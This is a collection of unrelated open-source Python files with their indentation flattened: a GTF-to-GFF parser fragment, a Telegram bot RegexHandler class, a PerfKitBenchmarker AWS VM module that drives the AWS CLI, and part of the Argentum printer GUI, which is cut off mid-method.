if re.search(r'^(start_codon|start-codon|startcodon)$', parts[2], re.IGNORECASE):
continue
gid= tid= gname= tname= ttype = None
for attb in parts[-1].split(';'):
if re.search(r'^\s?$', attb):
continue
attb = re.sub('"', '', attb).strip()
attb = attb.split()
if re.search(r'^(gene_id|geneid|name)$', attb[0], re.IGNORECASE):
gid = attb[1]
elif re.search(r'^(transcript_id|transcriptId)$', attb[0], re.IGNORECASE):
tid = attb[1]
elif re.search(r'^(gene_name|genename)$', attb[0], re.IGNORECASE):
gname = attb[1]
elif re.search(r'^(transcript_name|transcriptname)$', attb[0], re.IGNORECASE):
tname = attb[1]
elif re.search(r'^(transcript_type)$', attb[0], re.IGNORECASE):
ttype = attb[1]
if gid == tid: #UCSC GTF files, gene & transcript have same identifier
gid = 'Gene:'+str(gid)
tid = 'Transcript:'+str(tid)
        if tid is None: # JGI GTF files don't have a transcript ID on CDS lines
tid = recall
        exon, cds, sp_cod, st_cod = [], [], [], []
if re.search(r'^exon$', parts[2], re.IGNORECASE):
exon = [(int(parts[3]), int(parts[4]))]
elif re.search(r'^CDS$', parts[2], re.IGNORECASE):
cds = [(int(parts[3]), int(parts[4]))]
elif re.search(r'^(stop_codon|stop-codon|stopcodon)$', parts[2], re.IGNORECASE):
sp_cod = [(int(parts[3]), int(parts[4]))]
        else: # other feature lines are not needed in the GFF output
continue
#creating feature connections
if parts[0] in gtf_content: # adding to existing chromosome
if (gid, parts[1]) in gtf_content[parts[0]].keys(): # adding to existing gene
if tid in gtf_content[parts[0]][(gid, parts[1])].keys(): # adding to existing transcript
if exon:
gtf_content[parts[0]][(gid, parts[1])][tid]['exon'].append(exon[0])
elif cds:
gtf_content[parts[0]][(gid, parts[1])][tid]['CDS'].append(cds[0])
elif sp_cod:
gtf_content[parts[0]][(gid, parts[1])][tid]['sp_cod'].append(sp_cod[0])
else: # inserting new transcript
gtf_content[parts[0]][(gid, parts[1])][tid] = dict(exon = exon,
CDS = cds,
sp_cod = sp_cod,
info = [parts[6], parts[5], gname, tname, ttype])
else: # inserting new gene
gtf_content[parts[0]][(gid, parts[1])] = {tid : dict(exon = exon,
CDS = cds,
sp_cod = sp_cod,
info = [parts[6], parts[5], gname, tname, ttype])}
else: # inserting new chromosome identifier
gtf_content[parts[0]] = {(gid, parts[1]) : {tid : dict(exon = exon,
CDS = cds,
sp_cod = sp_cod,
info = [parts[6], parts[5], gname, tname, ttype])}}
recall = tid #set previous id for CDS line
GFH.close()
return gtf_content
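# Illustrative shape of the returned structure (identifiers are made up):
#
#     {'chr1': {('GeneID', 'source'): {'TranscriptID': {
#         'exon':   [(100, 200), (300, 400)],
#         'CDS':    [(120, 200), (300, 380)],
#         'sp_cod': [],
#         'info':   ['+', '.', 'gene_name', 'tr_name', 'tr_type']}}}}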
def __main__():
try:
gtf_fname = sys.argv[1]
except:
print __doc__
sys.exit(-1)
gtf_file_content = getGTFcontent(gtf_fname)
GFFWriter(gtf_file_content)
if __name__ == "__main__":
__main__()
| 0.019887 |
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
""" This module contains the RegexHandler class """
import re
from future.utils import string_types
from .handler import Handler
from telegram import Update
from telegram.utils.deprecate import deprecate
class RegexHandler(Handler):
"""
Handler class to handle Telegram updates based on a regex. It uses a
regular expression to check text messages. Read the documentation of the
``re`` module for more information. The ``re.match`` function is used to
determine if an update should be handled by this handler.
Args:
pattern (str or Pattern): The regex pattern.
callback (function): A function that takes ``bot, update`` as
positional arguments. It will be called when the ``check_update``
has determined that an update should be processed by this handler.
pass_groups (optional[bool]): If the callback should be passed the
result of ``re.match(pattern, text).groups()`` as a keyword
argument called ``groups``. Default is ``False``
pass_groupdict (optional[bool]): If the callback should be passed the
result of ``re.match(pattern, text).groupdict()`` as a keyword
argument called ``groupdict``. Default is ``False``
pass_update_queue (optional[bool]): If set to ``True``, a keyword argument called
``update_queue`` will be passed to the callback function. It will be the ``Queue``
instance used by the ``Updater`` and ``Dispatcher`` that contains new updates which can
be used to insert updates. Default is ``False``.
pass_job_queue (optional[bool]): If set to ``True``, a keyword argument called
``job_queue`` will be passed to the callback function. It will be a ``JobQueue``
instance created by the ``Updater`` which can be used to schedule new jobs.
Default is ``False``.
pass_user_data (optional[bool]): If set to ``True``, a keyword argument called
``user_data`` will be passed to the callback function. It will be a ``dict`` you
can use to keep any data related to the user that sent the update. For each update of
the same user, it will be the same ``dict``. Default is ``False``.
pass_chat_data (optional[bool]): If set to ``True``, a keyword argument called
``chat_data`` will be passed to the callback function. It will be a ``dict`` you
can use to keep any data related to the chat that the update was sent in.
For each update in the same chat, it will be the same ``dict``. Default is ``False``.
"""
def __init__(self,
pattern,
callback,
pass_groups=False,
pass_groupdict=False,
pass_update_queue=False,
pass_job_queue=False,
pass_user_data=False,
pass_chat_data=False,
allow_edited=False,
message_updates=True,
channel_post_updates=False):
super(RegexHandler, self).__init__(
callback,
pass_update_queue=pass_update_queue,
pass_job_queue=pass_job_queue,
pass_user_data=pass_user_data,
pass_chat_data=pass_chat_data)
if isinstance(pattern, string_types):
pattern = re.compile(pattern)
self.pattern = pattern
self.pass_groups = pass_groups
self.pass_groupdict = pass_groupdict
self.allow_edited = allow_edited
self.message_updates = message_updates
self.channel_post_updates = channel_post_updates
def _is_allowed_message(self, update):
return (self.message_updates
and (update.message or (update.edited_message and self.allow_edited)))
def _is_allowed_channel_post(self, update):
return (self.channel_post_updates
and (update.channel_post or (update.edited_channel_post and self.allow_edited)))
def check_update(self, update):
if (isinstance(update, Update)
and (self._is_allowed_message(update) or self._is_allowed_channel_post(update))
and update.effective_message.text):
match = re.match(self.pattern, update.effective_message.text)
return bool(match)
else:
return False
def handle_update(self, update, dispatcher):
optional_args = self.collect_optional_args(dispatcher, update)
match = re.match(self.pattern, update.effective_message.text)
if self.pass_groups:
optional_args['groups'] = match.groups()
if self.pass_groupdict:
optional_args['groupdict'] = match.groupdict()
return self.callback(dispatcher.bot, update, **optional_args)
# old non-PEP8 Handler methods
m = "telegram.RegexHandler."
checkUpdate = deprecate(check_update, m + "checkUpdate", m + "check_update")
handleUpdate = deprecate(handle_update, m + "handleUpdate", m + "handle_update")
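# Usage sketch (illustrative) for the pre-v12 bot API used above, where
# callbacks take (bot, update):
#
#     from telegram.ext import Updater, RegexHandler
#
#     def on_hello(bot, update):
#         update.effective_message.reply_text('hi!')
#
#     updater = Updater('TOKEN')  # hypothetical token placeholder
#     updater.dispatcher.add_handler(RegexHandler(r'(?i)^hello\b', on_hello))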
| 0.003247 |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class to represent an AWS Virtual Machine object.
All VM specifics are self-contained and the class provides methods to
operate on the VM: boot, shutdown, etc.
"""
import json
import logging
import threading
from perfkitbenchmarker import disk
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import package_managers
from perfkitbenchmarker import virtual_machine
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.aws import aws_disk
from perfkitbenchmarker.aws import util
FLAGS = flags.FLAGS
flags.DEFINE_string('aws_user_name', 'ubuntu',
'This determines the user name that Perfkit will '
'attempt to use. This must be changed in order to '
'use any image other than ubuntu.')
HVM = 'HVM'
PV = 'PV'
NON_HVM_PREFIXES = ['m1', 'c1', 't1', 'm2']
US_EAST_1 = 'us-east-1'
US_WEST_1 = 'us-west-1'
US_WEST_2 = 'us-west-2'
EU_WEST_1 = 'eu-west-1'
AP_NORTHEAST_1 = 'ap-northeast-1'
AP_SOUTHEAST_1 = 'ap-southeast-1'
AP_SOUTHEAST_2 = 'ap-southeast-2'
SA_EAST_1 = 'sa-east-1'
AMIS = {
HVM: {
US_EAST_1: 'ami-acff23c4',
US_WEST_1: 'ami-05717d40',
US_WEST_2: 'ami-fbce8bcb',
EU_WEST_1: 'ami-30b46b47',
AP_NORTHEAST_1: 'ami-d186dcd0',
AP_SOUTHEAST_1: 'ami-9afca7c8',
AP_SOUTHEAST_2: 'ami-956706af',
SA_EAST_1: 'ami-9970d884',
},
PV: {
US_EAST_1: 'ami-d2ff23ba',
US_WEST_1: 'ami-73717d36',
US_WEST_2: 'ami-f1ce8bc1',
EU_WEST_1: 'ami-4ab46b3d',
AP_NORTHEAST_1: 'ami-c786dcc6',
AP_SOUTHEAST_1: 'ami-eefca7bc',
AP_SOUTHEAST_2: 'ami-996706a3',
SA_EAST_1: 'ami-6770d87a',
}
}
PLACEMENT_GROUP_PREFIXES = frozenset(
['c3', 'c4', 'cc2', 'cg1', 'g2', 'cr1', 'r3', 'hi1', 'i2'])
NUM_LOCAL_VOLUMES = {
'c1.medium': 1, 'c1.xlarge': 4,
'c3.large': 2, 'c3.xlarge': 2, 'c3.2xlarge': 2, 'c3.4xlarge': 2,
'c3.8xlarge': 2, 'cc2.8xlarge': 4,
'cg1.4xlarge': 2, 'cr1.8xlarge': 2, 'g2.2xlarge': 1,
'hi1.4xlarge': 2, 'hs1.8xlarge': 24,
'i2.xlarge': 1, 'i2.2xlarge': 2, 'i2.4xlarge': 4, 'i2.8xlarge': 8,
'm1.small': 1, 'm1.medium': 1, 'm1.large': 2, 'm1.xlarge': 4,
'm2.xlarge': 1, 'm2.2xlarge': 1, 'm2.4xlarge': 2,
'm3.medium': 1, 'm3.large': 1, 'm3.xlarge': 2, 'm3.2xlarge': 2,
'r3.large': 1, 'r3.xlarge': 1, 'r3.2xlarge': 1, 'r3.4xlarge': 1,
'r3.8xlarge': 2,
}
DRIVE_START_LETTER = 'b'
INSTANCE_EXISTS_STATUSES = frozenset(
['pending', 'running', 'stopping', 'stopped'])
INSTANCE_DELETED_STATUSES = frozenset(['shutting-down', 'terminated'])
INSTANCE_KNOWN_STATUSES = INSTANCE_EXISTS_STATUSES | INSTANCE_DELETED_STATUSES
def GetBlockDeviceMap(machine_type):
"""Returns the block device map to expose all devices for a given machine.
Args:
machine_type: The machine type to create a block device map for.
Returns:
The json representation of the block device map for a machine compatible
with the AWS CLI, or if the machine type has no local disks, it will
return None.
"""
if machine_type in NUM_LOCAL_VOLUMES:
mappings = [{'VirtualName': 'ephemeral%s' % i,
'DeviceName': '/dev/xvd%s' % chr(ord(DRIVE_START_LETTER) + i)}
for i in xrange(NUM_LOCAL_VOLUMES[machine_type])]
return json.dumps(mappings)
else:
return None
def GetImage(machine_type, region):
"""Gets an ami compatible with the machine type and zone."""
prefix = machine_type.split('.')[0]
if prefix in NON_HVM_PREFIXES:
return AMIS[PV][region]
else:
return AMIS[HVM][region]
def IsPlacementGroupCompatible(machine_type):
"""Returns True if VMs of 'machine_type' can be put in a placement group."""
prefix = machine_type.split('.')[0]
return prefix in PLACEMENT_GROUP_PREFIXES
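# Illustrative examples for the helpers above (values follow from the
# NUM_LOCAL_VOLUMES, NON_HVM_PREFIXES and PLACEMENT_GROUP_PREFIXES tables):
#
#     GetBlockDeviceMap('i2.2xlarge')          # JSON mapping ephemeral0..1
#     GetBlockDeviceMap('t2.micro')            # None (no local volumes listed)
#     GetImage('m1.small', US_EAST_1)          # PV AMI ('m1' is a non-HVM prefix)
#     IsPlacementGroupCompatible('c3.large')   # True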
class AwsVirtualMachine(virtual_machine.BaseVirtualMachine):
"""Object representing an AWS Virtual Machine."""
_lock = threading.Lock()
imported_keyfile_set = set()
deleted_keyfile_set = set()
def __init__(self, vm_spec):
"""Initialize a AWS virtual machine.
Args:
vm_spec: virtual_machine.BaseVirtualMachineSpec object of the vm.
"""
super(AwsVirtualMachine, self).__init__(vm_spec)
self.region = self.zone[:-1]
self.image = self.image or GetImage(self.machine_type, self.region)
self.user_name = FLAGS.aws_user_name
# Default to zero local disks so CreateScratchDisk can rely on the attribute.
self.max_local_disks = NUM_LOCAL_VOLUMES.get(self.machine_type, 0)
self.local_disk_counter = 0
def ImportKeyfile(self):
"""Imports the public keyfile to AWS."""
with self._lock:
if self.region in self.imported_keyfile_set:
return
cat_cmd = ['cat',
vm_util.GetPublicKeyPath()]
keyfile, _ = vm_util.IssueRetryableCommand(cat_cmd)
import_cmd = util.AWS_PREFIX + [
'ec2', '--region=%s' % self.region,
'import-key-pair',
'--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri,
'--public-key-material=%s' % keyfile]
vm_util.IssueRetryableCommand(import_cmd)
self.imported_keyfile_set.add(self.region)
if self.region in self.deleted_keyfile_set:
self.deleted_keyfile_set.remove(self.region)
def DeleteKeyfile(self):
"""Deletes the imported keyfile for a region."""
with self._lock:
if self.region in self.deleted_keyfile_set:
return
delete_cmd = util.AWS_PREFIX + [
'ec2', '--region=%s' % self.region,
'delete-key-pair',
'--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri]
vm_util.IssueRetryableCommand(delete_cmd)
self.deleted_keyfile_set.add(self.region)
if self.region in self.imported_keyfile_set:
self.imported_keyfile_set.remove(self.region)
@vm_util.Retry()
def _PostCreate(self):
"""Get the instance's data and tag it."""
describe_cmd = util.AWS_PREFIX + [
'ec2',
'describe-instances',
'--region=%s' % self.region,
'--instance-ids=%s' % self.id]
logging.info('Getting instance %s public IP. This will fail until '
'a public IP is available, but will be retried.', self.id)
stdout, _ = vm_util.IssueRetryableCommand(describe_cmd)
response = json.loads(stdout)
instance = response['Reservations'][0]['Instances'][0]
self.ip_address = instance['PublicIpAddress']
self.internal_ip = instance['PrivateIpAddress']
self.group_id = instance['SecurityGroups'][0]['GroupId']
util.AddDefaultTags(self.id, self.region)
def _CreateDependencies(self):
"""Create VM dependencies."""
self.ImportKeyfile()
def _DeleteDependencies(self):
"""Delete VM dependencies."""
self.DeleteKeyfile()
def _Create(self):
"""Create a VM instance."""
super(AwsVirtualMachine, self)._Create()
placement = 'AvailabilityZone=%s' % self.zone
if IsPlacementGroupCompatible(self.machine_type):
placement += ',GroupName=%s' % self.network.placement_group.name
block_device_map = GetBlockDeviceMap(self.machine_type)
create_cmd = util.AWS_PREFIX + [
'ec2',
'run-instances',
'--region=%s' % self.region,
'--subnet-id=%s' % self.network.subnet.id,
'--associate-public-ip-address',
'--image-id=%s' % self.image,
'--instance-type=%s' % self.machine_type,
'--placement=%s' % placement,
'--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri]
if block_device_map:
create_cmd.append('--block-device-mappings=%s' % block_device_map)
stdout, _, _ = vm_util.IssueCommand(create_cmd)
response = json.loads(stdout)
self.id = response['Instances'][0]['InstanceId']
def _Delete(self):
"""Delete a VM instance."""
delete_cmd = util.AWS_PREFIX + [
'ec2',
'terminate-instances',
'--region=%s' % self.region,
'--instance-ids=%s' % self.id]
vm_util.IssueCommand(delete_cmd)
def _Exists(self):
"""Returns true if the VM exists."""
describe_cmd = util.AWS_PREFIX + [
'ec2',
'describe-instances',
'--region=%s' % self.region,
'--filter=Name=instance-id,Values=%s' % self.id]
stdout, _ = vm_util.IssueRetryableCommand(describe_cmd)
response = json.loads(stdout)
reservations = response['Reservations']
assert len(reservations) < 2, 'Too many reservations.'
if not reservations:
return False
instances = reservations[0]['Instances']
assert len(instances) == 1, 'Wrong number of instances.'
status = instances[0]['State']['Name']
assert status in INSTANCE_KNOWN_STATUSES, status
return status in INSTANCE_EXISTS_STATUSES
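# For reference, an abridged describe-instances response in the shape this
# method parses (values are hypothetical):
#
#   {"Reservations": [{"Instances": [{"State": {"Name": "running"}}]}]}
#
# An empty "Reservations" list means the instance no longer exists; a
# terminated instance still appears with state 'shutting-down'/'terminated'.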
def CreateScratchDisk(self, disk_spec):
"""Create a VM's scratch disk.
Args:
disk_spec: virtual_machine.BaseDiskSpec object of the disk.
"""
# Instantiate the disk(s) that we want to create.
if disk_spec.disk_type == disk.LOCAL:
disks = []
for _ in range(disk_spec.num_striped_disks):
local_disk = aws_disk.AwsDisk(disk_spec, self.zone)
local_disk.device_letter = chr(ord(DRIVE_START_LETTER) +
self.local_disk_counter)
self.local_disk_counter += 1
disks.append(local_disk)
if self.local_disk_counter > self.max_local_disks:
raise errors.Error('Not enough local disks.')
else:
disks = [aws_disk.AwsDisk(disk_spec, self.zone)
for _ in range(disk_spec.num_striped_disks)]
self._CreateScratchDiskFromDisks(disk_spec, disks)
def GetLocalDisks(self):
"""Returns a list of local disks on the VM.
Returns:
A list of strings, where each string is the absolute path to the local
disks on the VM (e.g. '/dev/sdb').
"""
return ['/dev/xvd%s' % chr(ord(DRIVE_START_LETTER) + i)
for i in xrange(NUM_LOCAL_VOLUMES[self.machine_type])]
def SetupLocalDisks(self):
"""Performs AWS specific setup of local disks."""
# Some images may automount one local disk, but we don't
# want to fail if this wasn't the case.
self.RemoteCommand('sudo umount /mnt', ignore_failure=True)
def AddMetadata(self, **kwargs):
"""Adds metadata to the VM."""
util.AddTags(self.id, self.region, **kwargs)
class DebianBasedAwsVirtualMachine(AwsVirtualMachine,
package_managers.AptMixin):
pass
class RhelBasedAwsVirtualMachine(AwsVirtualMachine,
package_managers.YumMixin):
pass
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Argentum Control GUI
Copyright (C) 2013 Isabella Stevens
Copyright (C) 2014 Michael Shiel
Copyright (C) 2015 Trent Waddington
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
import shutil
import threading
import time
from PyQt4 import QtGui, QtCore, QtSvg
from gerber import Gerber
import requests
from setup import VERSION, BASEVERSION, CA_CERTS
import tempfile
printPlateDesignScale = [1.0757, 1.2256] # printArea (mm) * scale = design size (mm)
imageScale = [ 23.70, 23.70] # pixels per millimeter
class PrintView(QtGui.QWidget):
layout = None
layoutChanged = False
printThread = None
dragging = None
resizing = None
selection = None
selection2 = None
def __init__(self, argentum):
super(PrintView, self).__init__()
self.argentum = argentum
self.lastRect = QtCore.QRect()
self.lastCheckForChanges = time.time()
self.progress = PrintProgressDialog(self)
self.progress.setWindowTitle("Printing")
self.progress.hide()
QtCore.QTimer.singleShot(100, self.progressUpdater)
self.fanSpeed = 4
QtCore.QTimer.singleShot(1000 / self.fanSpeed, self.fanAnimator)
self.printPlateArea = PrintRect(0, 0, 285, 255)
self.printArea = PrintRect(24, 73, 247, 127)
self.printLims = PrintRect(10, 14, 157, 98)
self.rollLims = PrintRect(80, 14, 87, 98)
self.printPlateDesign = QtSvg.QSvgRenderer("printPlateDesign.svg")
self.trashCan = QtSvg.QSvgRenderer("trashCan.svg")
self.trashCanOpen = QtSvg.QSvgRenderer("trashCanOpen.svg")
self.showTrashCanOpen = False
height = self.printArea.height * printPlateDesignScale[1]
self.printPlateDesignArea = PrintRect(12,
50,
self.printArea.width * printPlateDesignScale[0],
height)
self.images = []
self.setAcceptDrops(True)
self.setMouseTracking(True)
self.kerfPen = QtGui.QPen(QtGui.QColor(0, 0, 0))
self.kerfPen.setWidth(10)
self.kerfPen.setCapStyle(QtCore.Qt.RoundCap)
self.kerfOutlinePen = QtGui.QPen(QtGui.QColor(255, 255, 255))
self.kerfOutlinePen.setWidth(13)
self.kerfOutlinePen.setCapStyle(QtCore.Qt.RoundCap)
self.fanImage1 = QtGui.QPixmap("fan1.png")
self.fanImage2 = QtGui.QPixmap("fan2.png")
self.printHeadPixmap = QtGui.QPixmap("printhead.png")
self.printHeadImage = PrintImage(self.printHeadPixmap, "")
self.printHeadImage.minLeft = -24 + 10
self.printHeadImage.left = self.printHeadImage.minLeft
self.printHeadImage.minBottom = -73 + 11
self.printHeadImage.bottom = self.printHeadImage.minBottom
#self.printHeadImage.width = 95
#self.printHeadImage.height = 90
self.printHeadImage.width = 98
self.printHeadImage.height = 95
self.images.append(self.printHeadImage)
self.colorPicker = QtGui.QColorDialog()
self.pickColorFor = None
self.colorPicker.colorSelected.connect(self.colorPicked)
self.showingPrintHead = False
self.printButton = QtGui.QPushButton("Print")
self.printButton.clicked.connect(self.startPrint)
mainLayout = QtGui.QVBoxLayout()
layout = QtGui.QHBoxLayout()
layout.addStretch()
layout.addWidget(self.printButton)
layout.addStretch()
mainLayout.addStretch()
mainLayout.addLayout(layout)
self.setLayout(mainLayout)
self.imageList = ImageList(self)
def updatePrintHeadPos(self, pos):
if self.dragging == self.printHeadImage:
return
(xmm, ymm, x, y) = pos
self.printHeadImage.left = self.printHeadImage.minLeft + xmm
self.printHeadImage.bottom = self.printHeadImage.minBottom + ymm
self.printHeadImage.screenRect = None
self.update()
def showPrintHeadActionTriggered(self):
if self.showingPrintHead:
self.showingPrintHead = False
else:
self.showingPrintHead = True
self.argentum.updatePosDisplay()
self.update()
def showPrintLimsActionTriggered(self):
self.update()
def showRollLimsActionTriggered(self):
self.update()
def ratePrintActionTriggered(self):
rateDialog = RateYourPrintDialog(self)
rateDialog.exec_()
def nozzleTestActionTriggered(self):
pi = self.addImageFile("BothCartridgesNew.hex")
image = QtGui.QImage(pi.pixmap.width(), pi.pixmap.height(), QtGui.QImage.Format_RGB32)
image.fill(0xffffff)
p = QtGui.QPainter()
p.begin(image)
p.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(0, 0, 0)), 10, QtCore.Qt.SolidLine))
m = 20
h = image.height() / 9
for j in range(1, 10):
p.drawLine(m, j * h - h/2, image.width()-m, j * h - h/2)
p.drawLine(m, 1 * h - h/2, image.width()-m, 5 * h - h/2)
p.drawLine(m, 5 * h - h/2, image.width()-m, 9 * h - h/2)
p.end()
pi.pixmap = QtGui.QPixmap.fromImage(image)
def dryActionTriggered(self):
if self.printThread != None:
print("Already printing!")
return
self.printCanceled = False
self.progress = PrintProgressDialog(self)
self.progress.setWindowTitle("Drying")
self.progress.setLabelText("Starting up...")
self.progress.setValue(0)
self.progress.show()
self.printThread = threading.Thread(target=self.dryingLoop)
self.printThread.dryingOnly = True
self.printThread.start()
def dryingLoop(self):
try:
if self.argentum.options["use_rollers"] == False:
return
except:
pass
print("Drying mode on.")
try:
printer = self.argentum.printer
printer.command("l E", expect='rollers')
for image in self.images:
if image == self.printHeadImage:
continue
if not image.visible:
continue
print("Jacket drying.")
self.setProgress(labelText="Drying " + image.hexFilename)
pos = self.printAreaToMove(image.left + image.width - 60, image.bottom + 30)
x = pos[0]
y = pos[1]
sy = y
while y - sy < image.height * 80:
while self.progress.paused:
time.sleep(0.5)
printer.moveTo(x, y, withOk=True)
printer.waitForResponse(timeout=10, expect='Ok')
printer.command("l d", expect='rollers')
time.sleep(1.5)
left = x - int(image.width * 1.5) * 80
if left < 0:
left = 0
while self.progress.paused:
time.sleep(0.5)
printer.moveTo(left, y, withOk=True)
printer.waitForResponse(timeout=10, expect='Ok')
printer.command("l r", expect='rollers')
time.sleep(1.5)
y = y + 30 * 80
printer.command("l e", expect='rollers')
finally:
if self.printThread.dryingOnly:
self.printThread = None
self.setProgress(percent=100)
self.argentum.printer.home()
print("Your jacket is now dry.")
def calcScreenRects(self):
if self.lastRect == self.rect():
for image in self.images:
if image.screenRect == None:
image.screenRect = self.printAreaToScreen(image)
return
self.lastRect = self.rect()
# Ensure correct aspect ratio
aspectRect = QtCore.QRectF(self.rect())
aspectRatio = aspectRect.width() / aspectRect.height()
desiredAspectRatio = (self.printPlateArea.width /
self.printPlateArea.height)
#print("window {} x {}".format(aspectRect.width(), aspectRect.height()))
#print("aspect ratio {}".format(aspectRatio))
#print("desired aspect ratio {}".format(desiredAspectRatio))
if aspectRatio < desiredAspectRatio:
height = aspectRect.height() * (aspectRatio / desiredAspectRatio)
#print("calculated height {}".format(height))
#print("calculated aspect ratio {}".format(aspectRect.width() / height))
aspectRect.setTop((aspectRect.height() - height) / 2)
aspectRect.setHeight(height)
else:
width = aspectRect.width() / (aspectRatio / desiredAspectRatio)
#print("calculated width {}".format(width))
#print("calculated aspect ratio {}".format(width / aspectRect.height()))
aspectRect.setLeft((aspectRect.width() - width) / 2)
aspectRect.setWidth(width)
#print("printPlateRect is {}, {} {} x {}".format(aspectRect.left(),
# aspectRect.top(),
# aspectRect.width(),
# aspectRect.height()))
self.printPlateRect = aspectRect
# Now we can make the screen rects
self.printPlateDesignRect = self.printToScreen(self.printPlateDesignArea)
for image in self.images:
image.screenRect = self.printAreaToScreen(image)
self.trashCanRect = QtCore.QRectF(
(self.printPlateDesignRect.left() +
self.printPlateDesignRect.width() * 17 / 21),
(self.printPlateDesignRect.top() +
self.printPlateDesignRect.height() * 5 / 7),
self.printPlateDesignRect.width() / 8,
self.printPlateDesignRect.height() / 5)
ppdr = self.printPlateDesignRect
my = 30
mx = 30
self.leftLightsRect = QtCore.QRectF(ppdr.left() - mx - 10, ppdr.top() - my, mx, ppdr.height() + my*2)
self.rightLightsRect = QtCore.QRectF(ppdr.right() + mx / 2, ppdr.top() - my, mx, ppdr.height() + my*2)
self.bottomLightRects = []
mmx = mx/3
self.bottomLightRects.append(QtCore.QRectF(ppdr.left() + ppdr.width()*0.05, self.leftLightsRect.bottom() + my, mmx, mmx))
self.bottomLightRects.append(QtCore.QRectF(ppdr.left() + ppdr.width()/2 - mmx/2, self.leftLightsRect.bottom() + my, mmx, mmx))
self.bottomLightRects.append(QtCore.QRectF(ppdr.right() - ppdr.width()/13, self.leftLightsRect.bottom() + my, mmx, mmx))
self.leftKerfRect = QtCore.QRectF(ppdr.left() - mx*2, ppdr.bottom(), mx*2, my*2 + mmx*2)
self.rightKerfRect = QtCore.QRectF(ppdr.right(), ppdr.bottom(), mx*2, my*2 + mmx*2)
self.fanImage = self.fanImage1
fw = ppdr.width() / 13
self.leftFanRect = QtCore.QRectF(ppdr.left(), ppdr.top() - fw*2, fw, fw)
self.rightFanRect = QtCore.QRectF(ppdr.right() - fw, ppdr.top() - fw*2, fw, fw)
def printToScreen(self, printRect):
#print("printRect {}, {} {} x {}".format(printRect.left,
# printRect.bottom,
# printRect.width,
# printRect.height))
#print("printPlateArea {} x {}".format(self.printPlateArea.width,
# self.printPlateArea.height))
left = (self.printPlateRect.left() +
printRect.left / self.printPlateArea.width
* self.printPlateRect.width())
top = (self.printPlateRect.top() + self.printPlateRect.height() -
(printRect.bottom + printRect.height)
/ self.printPlateArea.height
* self.printPlateRect.height())
width = (printRect.width / self.printPlateArea.width
* self.printPlateRect.width())
height = (printRect.height / self.printPlateArea.height
* self.printPlateRect.height())
#print("on screen {}, {} {} x {}".format(left, top, width, height))
return QtCore.QRectF(left, top, width, height)
def printAreaToScreen(self, printRect):
p = PrintRect(self.printArea.left + printRect.left,
self.printArea.bottom + printRect.bottom,
printRect.width, printRect.height)
return self.printToScreen(p)
def printAreaToMove(self, offsetX, offsetY):
fudgeX = -80
fudgeY = -560
x = offsetX * 80 + fudgeX
y = offsetY * 80 + fudgeY
x = int(x)
y = int(y)
return (x, y)
def screenToPrintArea(self, x, y):
r = self.printToScreen(self.printArea)
dx = x - r.left()
dy = y - r.top()
return (dx * self.printArea.width / r.width(),
self.printArea.height - dy * self.printArea.height / r.height())
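# Coordinate cheat-sheet for the transforms above (a sketch; the 80
# steps/mm figure and fudge offsets are taken from printAreaToMove):
#   print-area mm -> screen px: printAreaToScreen (via printToScreen)
#   screen px -> print-area mm: screenToPrintArea (its inverse)
#   print-area mm -> motor steps: x = int(mm_x * 80) - 80,
#                                 y = int(mm_y * 80) - 560
# e.g. printAreaToMove(10, 10) == (720, 240).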
def updateTitle(self):
if self.layout:
name = os.path.basename(self.layout)
if name.find('.layout') == len(name)-7:
name = name[:len(name)-7]
self.argentum.setWindowTitle(name + " - Argentum Control")
else:
self.argentum.setWindowTitle("Argentum Control")
def paintEvent(self, event):
self.updateTitle()
self.calcScreenRects()
qp = QtGui.QPainter()
qp.begin(self)
qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.SolidLine))
qp.fillRect(self.rect(), QtGui.QColor(0,0,0))
self.printPlateDesign.render(qp, self.printPlateDesignRect)
if self.argentum.showPrintLimsAction.isChecked():
printLimsScreenRect = self.printAreaToScreen(self.printLims)
qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.DashLine))
qp.drawRect(printLimsScreenRect)
qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.SolidLine))
if self.argentum.showRollLimsAction.isChecked():
rollLimsScreenRect = self.printAreaToScreen(self.rollLims)
qp.drawRect(rollLimsScreenRect)
if self.dragging and self.dragging != self.printHeadImage:
if self.showTrashCanOpen:
self.trashCanOpen.render(qp, self.trashCanRect)
else:
self.trashCan.render(qp, self.trashCanRect)
for image in self.images:
if image == self.printHeadImage:
continue
if not image.visible:
continue
if image == self.selection or image == self.selection2:
r = QtCore.QRectF(image.screenRect)
r.setLeft(r.left()-1)
r.setTop(r.top()-1)
